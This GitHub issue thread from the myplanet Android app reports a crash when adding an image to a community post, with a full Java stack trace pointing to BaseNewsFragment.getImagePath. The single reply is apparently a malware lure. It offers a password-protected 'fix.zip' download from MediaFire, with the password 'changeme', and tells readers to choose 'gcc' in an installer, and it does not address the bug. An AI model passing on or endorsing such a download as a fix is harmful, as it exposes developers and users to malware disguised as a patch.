### ISSUE TITLE
crash in adding image in community

### ISSUE THREAD

**Issue by Okuro3499** [open-learning-exchange/myplanet#4274]
```
FATAL EXCEPTION: main
Process: org.ole.planet.myplanet, PID: 10305
java.lang.RuntimeException: Failure delivering result ResultInfo{who=null, request=1570016815, result=-1, data=Intent { dat=content://com.android.externalstorage.documents/... flg=0x1 }} to activity {org.ole.planet.myplanet/org.ole.planet.myplanet.ui.dashboard.DashboardActivity}: android.database.CursorIndexOutOfBoundsException: Index 0 requested, with a size of 0
	at android.app.ActivityThread.deliverResults(ActivityThread.java:5527)
	at android.app.ActivityThread.handleSendResult(ActivityThread.java:5566)
	at android.app.servertransaction.ActivityResultItem.execute(ActivityResultItem.java:67)
	at android.app.servertransaction.ActivityTransactionItem.execute(ActivityTransactionItem.java:45)
	at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:139)
	at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:96)
	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2443)
	at android.os.Handler.dispatchMessage(Handler.java:106)
	at android.os.Looper.loopOnce(Looper.java:205)
	at android.os.Looper.loop(Looper.java:294)
	at android.app.ActivityThread.main(ActivityThread.java:8177)
	at java.lang.reflect.Method.invoke(Native Method)
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:552)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:971)
Caused by: android.database.CursorIndexOutOfBoundsException: Index 0 requested, with a size of 0
	at android.database.AbstractCursor.checkPosition(AbstractCursor.java:521)
	at android.database.AbstractWindowedCursor.checkPosition(AbstractWindowedCursor.java:139)
	at android.database.AbstractWindowedCursor.getString(AbstractWindowedCursor.java:53)
	at android.database.CursorWrapper.getString(CursorWrapper.java:141)
	at org.ole.planet.myplanet.base.BaseNewsFragment.getImagePath(BaseNewsFragment.kt:123)
	at org.ole.planet.myplanet.base.BaseNewsFragment.onCreate$lambda$0(BaseNewsFragment.kt:61)
	at org.ole.planet.myplanet.base.BaseNewsFragment.$r8$lambda$q_45uv_IySpW-ho5Ly301N0LU7Y(Unknown Source:0)
	at org.ole.planet.myplanet.base.BaseNewsFragment$$ExternalSyntheticLambda0.onActivityResult(D8$$SyntheticClass:0)
	at androidx.activity.result.ActivityResultRegistry.doDispatch(ActivityResultRegistry.java:414)
	at androidx.activity.result.ActivityResultRegistry.dispatchResult(ActivityResultRegistry.java:371)
	at androidx.activity.ComponentActivity.onActivityResult(ComponentActivity.java:845)
	at androidx.fragment.app.FragmentActivity.onActivityResult(FragmentActivity.java:152)
	at android.app.Activity.dispatchActivityResult(Activity.java:8943)
	at android.app.ActivityThread.deliverResults(ActivityThread.java:5520)
	at android.app.ActivityThread.handleSendResult(ActivityThread.java:5566) 
	at android.app.servertransaction.ActivityResultItem.execute(ActivityResultItem.java:67) 
	at android.app.servertransaction.ActivityTransactionItem.execute(ActivityTransactionItem.java:45) 
	at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:139) 
	at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:96) 
	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2443) 
	at android.os.Handler.dispatchMessage(Handler.java:106) 
	at android.os.Looper.loopOnce(Looper.java:205) 
	at android.os.Looper.loop(Looper.java:294) 
	at android.app.ActivityThread.main(ActivityThread.java:8177) 
	at java.lang.reflect.Method.invoke(Native Method) 
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:552) 
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:971) 
	
```
[Screen_recording_20240827_183036.webm](https://github.com/user-attachments/assets/5e92fdc2-550b-4ff5-a83a-ba0e78aa57a5)

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
